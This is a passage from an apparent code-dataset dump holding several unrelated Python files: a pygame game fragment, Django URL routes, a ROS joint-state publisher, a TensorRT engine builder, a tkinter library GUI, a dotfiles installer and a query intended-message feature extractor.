pygame.font.SysFont(None, 80)\n End_text = font.render(\"Game Over\", True, BallColor)\n screen.blit(End_text, (160, 100))\n pygame.time.delay(1000)\n flag = 1\n if Ball_Y == 430:\n if Ball_X > Player_X and Ball_X < Player_X + 80:\n Ball_X = random.randrange(15,625)\n Ball_Y = 10\n SpeedVector_X = random.randint(0, 10) - 5\n SpeedVector_Y = random.randint(3, 5)\n pygame.display.flip()\n myclock.tick(60)\n\npygame.quit()\n","sub_path":"GettingBall.py","file_name":"GettingBall.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"292184015","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = 'users'\n\nurlpatterns = [\n path('users/', views.ShowUsersView.as_view(),\n name='users'),\n path('add_user/', views.AddUserView.as_view(),\n name='add-user'),\n path('delete_user/', views.DeleteUserView.as_view(),\n name='delete-user'),\n path('login', views.LoginUserView.as_view(),\n name='login'),\n path('logout', views.LogoutUserView.as_view(),\n name='logout'),\n]\n","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"170584936","text":"#!/usr/bin/env python\n\nimport rospy\nimport rosparam\nfrom sensor_msgs.msg import JointState\nfrom dynamixel_msgs.msg import MotorState\nfrom dynamixel_msgs.msg import MotorStateList\nfrom math import pi\nimport time\n\nrospy.init_node('State_Publisher')\n\n# Name of the joints in the robotic arm\n# Name of motor ID [1,2,3,4,5,6] is specified in the list.\njoints = [\"Ljoint0\",\"Ljoint1\",\"Ljoint2\",\"Ljoint3\",\"Ljoint4\",\"Ljoint5\",\"Ljoint6\"]\n\n\n#Dynamixel Motors will not be in Position 0 when switched ON. Dynamixel motors will have some initial position value. \n#In the URDF it is assumed that initial joint value is 0 radian. \n#Hence offset is required to match the URDF and the real robot.\n#Offset for motor id [10,11,13,14,15,16,17] is specified in the list.\nstart_ID = 10\n\nj0_init = rosparam.get_param(\"/LArm/joint0_controller/motor/init\")\nj1_init = rosparam.get_param(\"/LArm/joint1_controller/motor_master/init\")\nj2_init = rosparam.get_param(\"/LArm/joint2_controller/motor/init\")\nj3_init = rosparam.get_param(\"/LArm/joint3_controller/motor/init\")\nj4_init = rosparam.get_param(\"/LArm/joint4_controller/motor/init\")\nj5_init = rosparam.get_param(\"/LArm/joint5_controller/motor/init\")\nj6_init = rosparam.get_param(\"/LArm/joint6_controller/motor/init\")\n\n# offset = [512,512,512,512,512,512,512]\noffset = [j0_init,j1_init,j2_init,j3_init,j4_init,j5_init,j6_init]\nprint('L: ',offset)\n# offset = [512,2047,512,512,512,512,512]\n\n'''\nFunction: process(). Callback for subscriber of raw data from dynamixel motor. \nLogic: Dynamixel position = 0 for 0 degree and Dynamixel position = 1023 for 300 degree.\n Current position can be calculated by (position*(300.0/1023))*(pi/180) radian.\n Where position = feddback-offset.\n'''\ndef process(msg):\n\tjoint_states = JointState()\n\tjoint_states.header.stamp = rospy.Time.now()\n\n\tfor x in msg.motor_states:\n\n\t\tif(x.id != 12):\n\t\t\t# print(\"ID: {}\".format(x.id))\n\t\t\tif(x.id >= 13):\n\t\t\t\tif(x.id == 17): # in rrbot.xacro, the eef joint's name is left/right _gripper_joint. 
so chenge the name ans send the same parameter respectively.\n\t\t\t\t\teef_joints = ['Lleft_gripper_joint','Lright_gripper_joint']\n\t\t\t\t\tfor joint in eef_joints:\n\t\t\t\t\t\tjoint_states.name.append(joint)\n\t\t\t\t\t\tjoint_states.position.append((x.position-offset[x.id-start_ID-1])*(300.0/1023)*(pi/180))\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t#in case x.id == 13,14,15,16\n\t\t\t\t\tjoint_states.name.append(joints[x.id-start_ID-1])\n\t\t\t\t\tjoint_states.position.append((x.position-offset[x.id-start_ID-1])*(300.0/1023)*(pi/180))\n\t\t\telse:\n\t\t\t\tif(x.id == 10):\n\t\t\t\t\tresolution = 1023\n\t\t\t\t\tdeg_range = 300.0\n\t\t\t\telse:\n\t\t\t\t\t#in case x.id == 11\n\t\t\t\t\tresolution = 1023 if(offset[1] < 2000) else 4095 if(offset[1] > 2000) else 0\n\t\t\t\t\tdeg_range = 300.0 if(offset[1] < 2000) else 360.0\n\n\t\t\t\tif (resolution==0): \n\t\t\t\t\tprint('please check the offset value of pkg:dynamixelmotor node:state_publisher.py')\n\t\t\t\t\tprint('Probably offset value inside code is wrong')\n\t\t\t\t\tbreak\n\t\t\t\tjoint_states.name.append(joints[x.id-start_ID])\n\t\t\t\tjoint_states.position.append((x.position-offset[x.id-start_ID])*(deg_range/resolution)*(pi/180))\n\n\t\t#joint_states.velocity.append(x.velocity)\n\tpub.publish(joint_states)\n\n# Subscriber for raw feedback from dynamixel motor. Position of the motor will be in the range of (0,1023).\nsub = rospy.Subscriber('/LArm/motor_states/conbe_L_port',MotorStateList,process)\n# Publisher for the current position of dynamixel motor in radian\npub = rospy.Publisher('/LArm/joint_states',JointState,queue_size=10)\n\nrospy.spin()","sub_path":"dynamixel_motor/conbe/scripts/state_publisherL.py","file_name":"state_publisherL.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"140717239","text":"\nimport tensorrt as trt\nimport pycuda.driver as cuda\n\n\ndef ONNX_build_engine(onnx_file_path):\n '''\n 通过加载onnx文件,构建engine\n :param onnx_file_path: onnx文件路径\n :return: engine\n '''\n # 打印日志\n G_LOGGER = trt.Logger(trt.Logger.WARNING)\n\n with trt.Builder(G_LOGGER) as builder, builder.create_network() as network, trt.OnnxParser(network, G_LOGGER) as parser:\n builder.max_batch_size = 100\n builder.max_workspace_size = 1 << 20\n\n print('Loading ONNX file from path {}...'.format(onnx_file_path))\n with open(onnx_file_path, 'rb') as model:\n print('Beginning ONNX file parsing')\n parser.parse(model.read())\n print('Completed parsing of ONNX file')\n\n print('Building an engine from file {}; this may take a while...'.format(\n onnx_file_path))\n network.mark_output(network.get_layer(\n network.num_layers - 1).get_output(0))\n engine = builder.build_cuda_engine(network)\n print(\"Completed creating Engine\")\n\n # 保存计划文件\n # with open(engine_file_path, \"wb\") as f:\n # f.write(engine.serialize())\n return engine\n\n\nif __name__ == \"__main__\":\n ONNX_build_engine('yolov3_cap.onnx')\n","sub_path":"cap/build_engine.py","file_name":"build_engine.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"269774972","text":"from project.host import Host\nfrom project.components.hdd import Hdd\nfrom project.components.ram import Ram\n\nclass Server(Host):\n def __init__(self):\n Host.__init__(self)\n\n hdd1 = Hdd('hdd1')\n hdd1.set_size(2)\n self.add_hdd(hdd1)\n\n ram1 = Ram('ram1')\n ram1.set_size(16)\n self.add_ram(ram1)\n\n def display(self):\n print 
('Caractéristiques de la machine :')\n print('RAM ' + str(self.get_global_ram()) + ' GO')\n print('HDD ' + str(self.get_global_hdd()) + ' TO')\n print('Nombre de pièces ' + str(self.get_num_components()))\n","sub_path":"Host_with_server/project/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"489432942","text":"import datetime\nfrom tkinter import *\nimport time\nfrom datetime import datetime\nfrom tkinter import messagebox\nimport os\nimport mysql.connector as ms\n\nfrom db_credentials import setu\nfrom members import *\nfrom books import *\nfrom reg_window import *\nfrom book_window import *\nfrom borrow_window import *\n\n\n\n\"\"\"Setting up the geometry and the title\"\"\"\nroot = Tk()\nroot.title(\"Library management system\")\nroot.geometry('1600x800+0+0')\n\"\"\"set\"\"\"\n\n\nTopframe = Frame(root, width = 1350, height = 50,borderwidth=60, bd = 8, relief =\"sunken\")\nTopframe.pack(side = TOP)\n\nframeone = Frame(root, width = 600, height = 600,borderwidth=60,bg=\"lightgreen\", bd = 8, relief = \"sunken\")\nframeone.pack(side = LEFT)\n\n\nframetwo = Frame(root, width = 300, height = 700,borderwidth=60, bd = 8, relief = \"sunken\")\nframetwo.pack(side = RIGHT)\n\nfla = Frame(frameone,width = 600, height = 200, bd = 20,bg=\"lightgrey\", relief = \"raise\")\nfla.pack(side = TOP)\n\nflb = Frame(frameone,width = 600, height = 600, bd = 20,bg=\"lightgrey\", relief = \"raise\")\nflb.pack(side = TOP)\n\n\n\n\ndateoforder = StringVar()\ntimeoforder = StringVar()\n\n\ndateoforder.set(time.strftime(\"%d/%m/%Y\"))\ntimeoforder.set(time.strftime(\"%H:%M\"))\n\nlblName = Label(fla, text = \"BOOKS\",bg=\"lightgrey\",fg = \"red\", font = ('arial',30,'bold'),bd = 20)\nlblName.grid(row = 0, column = 0)\n\nlbladdress = Label(fla, text = \"MEMBERS\",bg=\"lightgrey\",fg = \"red\", font = ('arial',30,'bold'),bd = 20)\nlbladdress.grid(row = 0, column = 2)\n\nlbladdress = Label(fla, text = \"Utility\",bg=\"lightgrey\",fg = \"red\", font = ('arial',30,'bold'),bd = 20)\nlbladdress.grid(row = 0, column = 3)\n\n\n#buttons\n\nact_addbook_win = Button(fla,text = 'Add book', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"lightyellow\", font = ('arial',16), width = 15, height = 1,command = start_addbook_win).grid(row = 1, column = 0)\n\nact_searchBook_win = Button(fla,text = 'Search book', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"lightyellow\", font = ('arial',16), width = 15, height = 1,command = start_searchBook_win).grid(row = 2, column = 0)\n\nact_listAllbooks_win = Button(fla,text = 'All books', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"lightyellow\", font = ('arial',16), width = 15, height = 1,command = start_listAllbooks_win).grid(row = 3, column = 0)\n\n#act_up8Book_win = Button(fla,text = 'Update book', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"lightyellow\", font = ('arial',16,'bold'), width = 15, height = 1).grid(row = 4, column = 0)\n\nact_registerMember_win = Button(fla,text = 'Register member', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"lightyellow\", font = ('arial',16), width = 15, height = 1,command = start_reg_win).grid(row = 1, column = 2)\nact_allMembers_win = Button(fla,text = 'Search Member', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"lightyellow\", font = ('arial',16), width = 15, height = 1,command = start_listAll_members).grid(row = 2, column = 2)\n\n\nact_issueBook_win = tk.Button(fla, text=\"Issue Book\", 
padx=16, pady=16, bd=8, fg=\"black\", bg=\"lightyellow\", font=('arial',16,'bold'),width=15, height=1, command = start_issueBook_win).grid(row=1, column=3)\nact_returnBook_win = tk.Button(fla,text=\"Return Book\",padx = 16, pady = 16, bd=8, fg = \"black\", bg = \"lightyellow\", font = ('arial',16,'bold'), width = 15, height=1, command = start_returnBook_win).grid(row =2, column=3)\nact_unreturned_books = tk.Button(fla,text=\"Unreturned Books\",padx = 16, pady = 16, bd=8, fg = \"black\", bg = \"lightyellow\", font = ('arial',16), width = 15, height=1, command = start_unreturnedBooks_win).grid(row =3, column=3)\n\nexit = Button(flb,text = 'Exit', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"red\", font = ('arial',16,'bold'), width = 20, height = 1, command= root.destroy).grid(row = 0, column = 1)\n\n\n\n\n\n\n\nlbldate = Label(frametwo,textvariable = dateoforder, font = ('arial',21,'bold')).grid(row = 0, column = 0)\nlbltime = Label(frametwo,textvariable = timeoforder, font = ('arial',21,'bold')).grid(row = 1, column = 0)\ntxtsalary = Text(frametwo, height = 22, width = 34, bd = 16, font=('arial',12,'bold'))\ntxtsalary.grid(row = 2, column = 0)\n\n\nlblinfo = Label(Topframe, font =('arial', 60, 'bold'), bg = \"lightblue\",fg = \"Blue\", text = \" MIT Academy of Engineering \", bd = 10,)\nlblinfo.grid(row = 0, column = 0)\n\nlblmin = Label(Topframe, font = ('arial',15),fg=\"Blue\", text = \"(An Autonomous institute affiliated to SPPU)\")\nlblmin.grid(row = 1,column = 0)\nlblmin = Label(Topframe, font = ('arial',15), text = \"School of Computer Engineering and Technology\")\nlblmin.grid(row = 2,column = 0)\n\n\n\nroot.mainloop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"418312721","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport subprocess\nimport argparse\nimport logging\n\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\n\nfrom logging import Formatter, StreamHandler\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n_handler = StreamHandler()\n_handler.setFormatter(Formatter(\n '%(asctime)s %(levelname)s: %(message)s',\n '%Y-%m-%d %H:%M:%S'\n))\nlogger.addHandler(_handler)\n\ndef error(msg, *args, **kwargs):\n logger.error(msg, *args)\n if 'exit' in kwargs and kwargs['exit']:\n sys.exit(1)\n\nclass Command():\n def update_submodules(self):\n proc = subprocess.Popen(['git', 'submodule', 'init'])\n ret = proc.wait()\n if ret != 0:\n error(\"Failed to initialize git submodules\", exit=True)\n\n proc = subprocess.Popen(['git', 'submodule', 'update'])\n ret = proc.wait()\n if ret != 0:\n error(\"Failed to update git submodules\", exit=True)\n\nclass Install(Command):\n def __init__(self, options):\n self.options = options\n self.update_submodules()\n self.install_dotfiles()\n self.install_vundle()\n\n def install_dotfiles(self):\n to_install = os.listdir(os.path.join(BASE_DIR, 'dotfiles'))\n to_install = self.filter_shellfiles(to_install)\n for source in to_install:\n source_path = os.path.join(BASE_DIR, 'dotfiles', source)\n target_path = os.path.join(os.environ['HOME'], '.' 
+ source)\n self.remove_file(target_path)\n os.symlink(source_path, target_path)\n logger.info('Linked %s', source_path)\n\n def filter_shellfiles(self, dotfiles):\n if self.options.shell == 'zsh':\n return [f for f in dotfiles if 'bash' not in f]\n elif self.options.shell == 'bash':\n return [f for f in dotfiles if 'zsh' not in f]\n\n def remove_file(self, target):\n proc = subprocess.Popen(['rm', '-rf', target],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n ret = proc.wait()\n if ret != 0:\n error(\"Failed to remove file %s\", target, exit=True)\n\n def install_vundle(self):\n proc = subprocess.Popen(['vim', '+PlugInstall', '+qall'])\n ret = proc.wait()\n if ret != 0:\n error(\"Failed to install vim plugins...\", exit=True)\n\nclass Update(Command):\n def __init__(self, options):\n self.options = options\n self.update_git()\n self.update_submodules()\n self.update_vundle()\n\n def update_git(self):\n proc = subprocess.Popen(['git', 'pull'])\n ret = proc.wait()\n if ret != 0:\n error(\"Failed to pull latest changes\", exit=True)\n\n def update_vundle(self):\n proc = subprocess.Popen(['vim', '+PlugUpdate', '+qall'])\n ret = proc.wait()\n if ret != 0:\n error(\"Failed to update vundle, I recommend running :PlugUpdate inside vim.\", exit=True)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n\n subparser = subparsers.add_parser('install', help=\"Install rcfiles into your home directory.\")\n subparser.add_argument('--shell', default=\"zsh\", choices=[\"zsh\", \"bash\"], help=\"Which shell you want to install rc files for.\")\n subparser.set_defaults(CommandClass=Install)\n\n subparser = subparsers.add_parser('update', help=\"Update rcfiles.\")\n subparser.set_defaults(CommandClass=Update)\n\n options = parser.parse_args()\n command = options.CommandClass(options)\n","sub_path":"rcfiles.py","file_name":"rcfiles.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"367687497","text":"'''\nCreated on Jan 10, 2013\n\n@author: ivanka li\n\nThis module take in the complete list of query-entity pairs. \n\nAnd match each query-entity pair with their decision tree classification.\n\n'''\n# from CleanDecisionResults import CleanDecision\nfrom AxesDecisionResults import AxesDecisionResults\n\nimport sys, re, random, os.path, subprocess\n \nclass QueryEntities():\n \n def __init__(self, qe, attrPath):\n self.qePairs, self.attrList = [], []\n self.initQE(qe)\n self.initAttr(attrPath) \n \n \n def initQE(self, qe):\n if os.path.isfile(qe):\n fhandler = open(qe, 'r')\n for line in fhandler.readlines():\n if len( line.split() ) > 1 and re.match(r'[0-9]', line)!=0:\n self.qePairs.append(line)\n # print line.replace('\\r\\n', '').split('\\t')\n fhandler.close()\n else:\n self.qePairs.append(qe)\n \n def initAttr(self, attrPath):\n if os.path.isfile(attrPath):\n fhandler = open(attrPath, 'r')\n lno = 1\n for line in fhandler.readlines():\n if not re.match(\"@\", line) and len(line) > 1: \n self.attrList.append( map( lambda x: int(x), line.split(',')[:-1] ) )\n lno = lno +1\n fhandler.close()\n else:\n self.attrPath.append(attrPath)\n \n\ndef deprecated(replacement=None):\n '''This is a decorator which can be used to mark functions\n as deprecated. 
It will result in a warning being emitted\n when the function is used.'''\n \nclass IgAttributes():\n \n def __init__(self, XYDecision, QueryEntity, EntityAttrPath, AnnotationPath, num_of_queries):\n self.axesDecision = AxesDecisionResults(XYDecision)\n self.qe = QueryEntities(QueryEntity, EntityAttrPath)\n self.annotation = Annotations(AnnotationPath)\n self.numOfX, self.numOfY, self.singularPluralX, self.superlatives, self.specialWords, self.npRelation, self.time, self.modified, self.wiki_sim = \\\n [0]*num_of_queries, [0]*num_of_queries, [0]*num_of_queries, [0]*num_of_queries, \\\n [0]*num_of_queries, [0]*num_of_queries, [0]*num_of_queries, [0]*num_of_queries, [0]*num_of_queries\n self.__runAll()\n \n \n def __numOfXEntities(self):\n '''\n 4 class values: \n - no X found: 0 \n - 1 X found: 1 \n - 2 X found: 2 \n - more than 2 X found: 3\n '''\n for q_index in range( len( self.axesDecision.resultList ) ):\n count = 0\n for r in self.axesDecision.resultList[q_index]:\n if r == 'x': count = count + 1\n if count == 0:\n self.numOfX[q_index] = 0\n elif count == 1:\n self.numOfX[q_index] = 1\n elif count == 2: \n self.numOfX[q_index] = 2\n else:\n self.numOfX[q_index] = 3\n \n def __numOfYEntities(self):\n '''\n 3 class values:\n - no y found: 0\n - 1 y found: 1\n - more than 1 y found: 2\n '''\n for q_index in range( len( self.axesDecision.resultList ) ):\n count = 0\n for r in self.axesDecision.resultList[q_index]:\n if r == 'y': count = count + 1\n if count == 0:\n self.numOfY[q_index] = 0 \n elif count <= 2:\n self.numOfY[q_index] = 1\n else:\n self.numOfY[q_index] = 2\n \n def __pluralX(self):\n '''\n Use attr no. 37 NP_sorp to see if in the entity list any entity has plural form\n 3 class value: \n - all X are singular: 0\n - all X are plural: 1\n - X have singular vs plural: 2\n '''\n for q_index in range( len(self.axesDecision.rangeList) ):\n lo, hi = self.axesDecision.rangeList[q_index]\n plural, numX = 0, 0\n # ---\n# sys.stdout.write('%d\\n' % q_index)\n # ---\n for en_index in range(lo, hi+1):\n if self.axesDecision.resultList[q_index][en_index-lo] == 'x' and self.qe.attrList[en_index][46] !=1:\n # is X entity, and not time interval\n numX = numX +1\n plural = self.qe.attrList[en_index][37] + plural\n # ---\n# sys.stdout.write('%s' % self.qe.qePairs[en_index].replace('\\t', '').replace('U.S.', 'united states'))\n # ---\n if self.axesDecision.resultList[q_index][en_index-lo] == 'x' and self.qe.attrList[en_index][46] > 0: \n plural = -1\n if plural == -1:\n self.singularPluralX[q_index] = 0\n elif plural == 0: \n # all singular\n self.singularPluralX[q_index] = 1\n elif plural == numX: \n # all plural\n self.singularPluralX[q_index] = 2\n elif plural < numX: \n # singular mixed with plural\n self.singularPluralX[q_index] = 3\n \n def __modifiedX(self):\n '''\n Use attr no 22, 23, 24 to see whether the entity is modified by all, other, each\n 4 class value:\n - No modification: 0\n - Modified by \"all\": 1\n - Modified by \"other\": 2\n - Modified by \"each\": 3\n '''\n for q_index in range( len(self.axesDecision.rangeList) ):\n lo, hi = self.axesDecision.rangeList[q_index]\n for en_index in range(lo, hi+1):\n if self.axesDecision.resultList[q_index][en_index-lo] == 'x':\n if self.qe.attrList[en_index][22] == 1:\n self.modified[q_index] = 1\n elif self.qe.attrList[en_index][23] == 1:\n self.modified[q_index] = 2\n elif self.qe.attrList[en_index][24] == 1:\n self.modified[q_index] = 3\n \n def __superlative(self):\n '''\n 2 class values: Yes/No\n '''\n for q_index in range( len( 
self.axesDecision.rangeList ) ):\n lo, hi = self.axesDecision.rangeList[q_index]\n self.superlatives[q_index] = self.qe.attrList[lo][0] \n \n def __trendCompareWords(self):\n '''\n use attribute no 2 trend_in_sentence and no 3 compare_in_sentence\n 4 class values:\n - neither verb: 0\n - compare verb: 1\n - trend verb: 2\n '''\n for q_index in range( len( self.axesDecision.rangeList ) ):\n lo, hi = self.axesDecision.rangeList[q_index]\n if self.qe.attrList[lo][2] < self.qe.attrList[lo][3] :\n self.specialWords[q_index] = 1\n elif self.qe.attrList[lo][2] > self.qe.attrList[lo][3]:\n self.specialWords[q_index] = 2\n \n def __npPattern(self):\n '''\n must be ran after function pluralX() and trendCompareVb()\n 3 class values:\n - none: 0\n - singular np vs singular np: 1\n - singular np vs plural np: 2\n - plural compared: 3\n '''\n for q_index in range( len(self.axesDecision.rangeList) ):\n if self.specialWords[q_index] == 1:\n if self.singularPluralX[q_index] == 1 :\n # all singular\n if self.numOfX[q_index] >2:\n self.npRelation[q_index] = 3\n else:\n self.npRelation[q_index] = 1\n elif self.singularPluralX[q_index] == 2: \n # all plural \n self.npRelation[q_index] = 3\n elif self.singularPluralX[q_index] == 3:\n # singular mixed with plural\n self.npRelation[q_index] = 2\n\n \n def __timeInterval(self):\n '''\n use attr no 41 time_type: 0-none, 1-interval, 2-period\n '''\n for q_index in range( len(self.axesDecision.rangeList) ):\n lo, hi = self.axesDecision.rangeList[q_index]\n for en_index in range(lo, hi+1):\n self.time[q_index] = self.qe.attrList[en_index][46] \n\n @deprecated\n def __wiki_similarity(self):\n '''\n 0: doesn't contain equal entities\n 1: contain 1 pair of equal entities\n 2: contain more than 1 pair of equal entities\n '''\n wiki = entity_sim('../../../Wikimantic_Result.txt')\n wikiclass = []\n \n wikiclassfile = open('../../../j48_wiki.txt', 'r', 1)\n\n for line in wikiclassfile.readlines():\n act = re.search(re.compile('Actual:'), line).end()\n pred = re.search(re.compile('Predicted:'), line).end()\n wikiclass.append( int(line[pred:pred+2]) )\n# print len(wikiclass), len(wiki.wiki_range)\n# print wikiclass, '\\n', wiki.wiki_range\n\n cumulative,use = 0,0\n for qno in range(len(wiki.wiki_range)):\n w_count,w_count2 = 0, 0\n# sys.stdout.write( '\\n%d----\\n' % qno)\n wiki_count = wiki.wiki_range[qno]\n if wiki_count == 0:\n cumulative = cumulative + 1\n# sys.stdout.write('%d\\n' % (cumulative))\n else:\n cumulative = cumulative + 1\n for w_index in range( wiki_count ):\n# sys.stdout.write('%d\\n' % (cumulative+w_index))\n if wikiclass[cumulative+w_index-1] == 2:\n w_count = w_count + 1 \n use = use + 1\n if wikiclass[cumulative+w_index-1] == 1:\n w_count2 = w_count2+1\n use = use + 1\n cumulative = cumulative + wiki_count-1\n \n if w_count == 1: self.wiki_sim[qno] = 1 # rel_diff\n elif w_count >= 2 : self.wiki_sim[qno] = 2 # rank_all\n elif w_count2 == 1: self.wiki_sim[qno] = 3 # rank_1\n elif w_count2 >1 : self.wiki_sim[qno] = 2 # rank_all\n# print use\n \n \n def __runAll(self):\n self.__numOfXEntities()\n self.__numOfYEntities()\n self.__pluralX()\n self.__superlative()\n self.__trendCompareWords()\n self.__npPattern()\n self.__timeInterval()\n self.__modifiedX()\n\n\n def print_attr(self):\n for qno in range( len( self.axesDecision.resultList ) ):\n lo, hi = self.axesDecision.rangeList[qno]\n for attr in [self.numOfX[qno], self.numOfY[qno], self.singularPluralX[qno], \\\n self.superlatives[qno], self.specialWords[qno], self.npRelation[qno], self.time[qno], 
self.modified[qno] ]:\n sys.stdout.write('%d,' % attr)\n \n for attr in [self.qe.attrList[lo][1], self.qe.attrList[lo][4], self.qe.attrList[lo][5], \\\n self.qe.attrList[lo][6]]:\n sys.stdout.write('%d,' % attr)\n sys.stdout.write('%d,' % self.qe.attrList[lo][7])\n sys.stdout.write('%s\\n' % self.annotation.IMannotation[qno])\n\n def classifyIM(self, location):\n IM_attr_matrix = []\n for qno in range( len( self.axesDecision.resultList ) ):\n lo, hi = self.axesDecision.rangeList[qno]\n IM_attr_matrix.append( [self.numOfX[qno], self.numOfY[qno], self.singularPluralX[qno], \\\n self.superlatives[qno], self.specialWords[qno], self.npRelation[qno], self.time[qno], self.modified[qno] ] + \\\n [self.qe.attrList[lo][1], self.qe.attrList[lo][4], self.qe.attrList[lo][5], self.qe.attrList[lo][6], self.qe.attrList[lo][7] ] )\n from ARFFheader import Add_ARFFheader\n Add_ARFFheader( \"IM\", IM_attr_matrix , location)\n IM_weka_result = subprocess.check_output(\"java -cp ./src/Query/EntityExtractionSystem_03_2015/src/weka-3-6-6/weka.jar weka.classifiers.trees.J48 -l ./src/Query/EntityExtractionSystem_03_2015/src/weka-3-6-6/IMtree.j48.model -T \" + location + \" -p 0\" , shell=True)\n for result in IM_weka_result.split(\"\\n\"):\n match = re.search(\"[1-8]:[GMRT]\", result)\n if match: \n return {1:\"Get-Rank\",\n 2:\"Maximum-Minimum-Multiple\",\n 3:\"Maximum-Minimum-Single\",\n 4:\"General-Multiple\", \n 5:\"General-Single\", \n 6:\"Relative-Difference\", \n 7:\"Rank-All\", \n 8:\"Trend\"}[int( result[match.start()]) ]\n \n\n \n \nclass entity_sim():\n \n def __init__(self, wiki_result_path):\n self.init(wiki_result_path)\n \n def init(self, wiki_result_path):\n self.wiki_result, self.wiki_range = [], []\n prev_qno, wiki_count = -1, 0\n \n wiki_file = open(wiki_result_path, 'r', 1)\n for line in wiki_file.readlines():\n if len(line.split(',')) == 1:\n if prev_qno != -1:\n# self.wiki_result.append(wiki_pair)\n self.wiki_range.append(wiki_count) \n \n prev_qno = int(line)-1\n# if len(wiki_pair) == 0:\n# sys.stdout.write('0.0,0.0\\n')\n# wiki_pair = []\n wiki_count = 0\n \n else: \n# wiki_pair.append( [ float( line.split(',')[2] ), float( line.split(',')[3] ) ] )\n# sys.stdout.write('%s,' % ( line.split(',')[2] ) )\n# sys.stdout.write('%s' % ( line.split(',')[3] ) )\n wiki_count = wiki_count + 1\n self.wiki_range.append(wiki_count)\n \nclass Annotations():\n \n def __init__(self, annotationPath):\n Machine_Reliant_IM_Path = '../../Entity/Machine_Reliant_IM_Result.txt'\n self.init(annotationPath, Machine_Reliant_IM_Path)\n\n# self.igAttr = IgAttributes(XYDecisionPath, QueryEntityPath, EntityAttrPath)\n \n def init(self, annotationPath, IMresultPath):\n if os.path.isfile(annotationPath):\n annotationFile = open(annotationPath, 'r', 1)\n IMresultFile = open(IMresultPath, 'r', 1)\n self.annotatedAttrs, self.IMresults, self.IMannotation = [], [], []\n \n for line in annotationFile.readlines():\n attr, IM = [int(i) for i in line.split(',')[:-1]], line.split(',')[-1]\n # trend_count = 0\n # if IM.replace('\\n', '') == 'Trend' and random.random() > 0.8 and trend_count >=30:\n # break\n # else:\n # trend_count = trend_count +1 \n self.annotatedAttrs.append(attr)\n self.IMannotation.append(IM.replace('\\n', '').replace(\"-\", \"\"))\n elif len(annotationPath) == 0:\n self.IMannotation = [\"?\"]\n# for line in IMresultFile.readlines():\n# self.IMresults.append(line.replace('\\n', ''))\n \n def create_test(self):\n for i in range( len(self.annotatedAttrs) ):\n for a in self.annotatedAttrs[i]:\n sys.stdout.write('%d,' 
% a)\n sys.stdout.write('%s\\n' % self.IMannotation[i])\n \n def compareDiff(self):\n diffCount = 0\n for qno in range( len(self.annotatedAttrs) ):\n diff, classDiff = 0, 0\n generated = [self.igAttr.numOfX[qno], self.igAttr.numOfY[qno], self.igAttr.singularPluralX[qno], \\\n self.igAttr.superlatives[qno], self.igAttr.specialWords[qno], self.igAttr.npRelation[qno], \\\n self.igAttr.time[qno], self.igAttr.modified[qno] ]\n for attr in range( len(self.annotatedAttrs[qno]) ):\n if self.annotatedAttrs[qno][attr] != generated[attr]:\n diff = 1\n break\n if self.IMannotation[qno] != self.IMresults[qno]:\n classDiff = 1\n if classDiff == 1 or classDiff == 0:\n diffCount = diffCount + 1\n sys.stdout.write('Query %d.\\n' % (qno+1))\n sys.stdout.write('Query-Entity Pair %d - ' % self.igAttr.axesDecision.rangeList[qno][0] )\n sys.stdout.write('%d ' % self.igAttr.axesDecision.rangeList[qno][1] )\n sys.stdout.write('in total %d queries.\\n' % len(self.igAttr.axesDecision.rangeList))\n lo, hi = self.igAttr.axesDecision.rangeList[qno]\n for entity_index in range(lo, (hi+1)):\n sys.stdout.write('%s ' % self.igAttr.axesDecision.resultList[qno][(entity_index-lo)])\n sys.stdout.write('%s' % self.igAttr.qe.qePairs[entity_index])\n \n sys.stdout.write('annotated: ')\n for attr in self.annotatedAttrs[qno]:\n sys.stdout.write('%d ' % attr)\n \n sys.stdout.write('\\ngenerated: ')\n for gattr in generated:\n sys.stdout.write('%d ' % gattr)\n \n sys.stdout.write('\\nIntended Message: %s' % self.IMannotation[qno] )\n sys.stdout.write('\\nClassified as: %s' % self.IMresults[qno])\n \n sys.stdout.write('\\n\\n')\n sys.stdout.write('--- In total, %d queries have different Intended Messages.' % diffCount) \n \n\n\n \nif __name__ == '__main__':\n \n '''\n Use the following set of parameters if creating IM attributes for the 324 queries in Matt's experiment\n '''\n XYDecisionPath = 'New_Axis_Classification_Results.txt'\n QueryEntityPath = '../../Entity/New_XYEntities.txt' \n AnnotationPath = '../../Entity/AnnotatedIgAttr.txt'\n training_query_number = 324 \n EntityAttrPath = '../../Entity/New_XYAttributes.arff'\n \n '''\n Use the following set of parameters if testing IM attribute generation for a particular query\n '''\n XYDecision = \"X;X;X\"\n QueryEntity = \"America;China;GDP\"\n 